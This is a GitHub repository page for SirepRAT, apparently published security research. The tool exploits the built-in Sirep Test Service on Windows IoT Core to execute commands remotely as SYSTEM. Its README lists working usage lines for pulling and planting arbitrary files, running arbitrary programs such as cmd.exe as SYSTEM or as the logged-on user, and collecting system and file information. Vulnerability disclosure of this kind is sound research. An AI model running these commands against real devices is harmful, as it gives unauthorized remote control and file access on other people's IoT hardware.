Skip to content
Remote Command Execution as SYSTEM on Windows IoT Core
Branch: master
Clone or download
Fetching latest commit…
Cannot retrieve the latest commit at this time.
Type Name Latest commit message Commit time
Failed to load latest commit information.
common initial commit Mar 2, 2019
docs added WP and slides Mar 4, 2019
models initial commit Mar 2, 2019
payloads initial commit Mar 2, 2019
.gitignore initial commit Mar 2, 2019 README updated Apr 4, 2019 initial commit Mar 2, 2019

SirepRAT - RCE as SYSTEM on Windows IoT Core

SirepRAT Features full RAT capabilities without the need of writing a real RAT malware on target.


The method is exploiting the Sirep Test Service that’s built in and running on the official images offered at Microsoft’s site. This service is the client part of the HLK setup one may build in order to perform driver/hardware tests on the IoT device. It serves the Sirep/WPCon/TShell protocol.

We broke down the Sirep/WPCon protocol and demonstrated how this protocol exposes a remote command interface for attackers, that include RAT abilities such as get/put arbitrary files on arbitrary locations and obtain system information.

Based on the findings we have extracted from this research about the service and protocol, we built a simple python tool that allows exploiting them using the different supported commands. We called it SirepRAT.

It features an easy and intuitive user interface for sending commands to a Windows IoT Core target. It works on any cable-connected device running Windows IoT Core with an official Microsoft image.

Slides and White Paper

Slides and research White Paper are in the docs folder


Download File

python GetFileFromDevice --remote_path "C:\Windows\System32\drivers\etc\hosts" -v

Upload File

python PutFileOnDevice --remote_path "C:\Windows\System32\uploaded.txt" --data "Hello IoT world!"

Run Arbitrary Program

python LaunchCommandWithOutput --return_output --cmd "C:\Windows\System32\hostname.exe"

With arguments, impersonated as the currently logged on user:

python LaunchCommandWithOutput --return_output --as_logged_on_user --cmd "C:\Windows\System32\cmd.exe" --args " /c echo {{userprofile}}"

(Try to run it without the as_logged_on_user flag to demonstrate the SYSTEM execution capability)

Get System Information

python GetSystemInformationFromDevice

Get File Information

python GetFileInformationFromDevice --remote_path "C:\Windows\System32\ntoskrnl.exe"

See help for full details:

python --help


Dor Azouri (@bemikre)


BSD 3 - clause "New" or "Revised" License

You can’t perform that action at this time.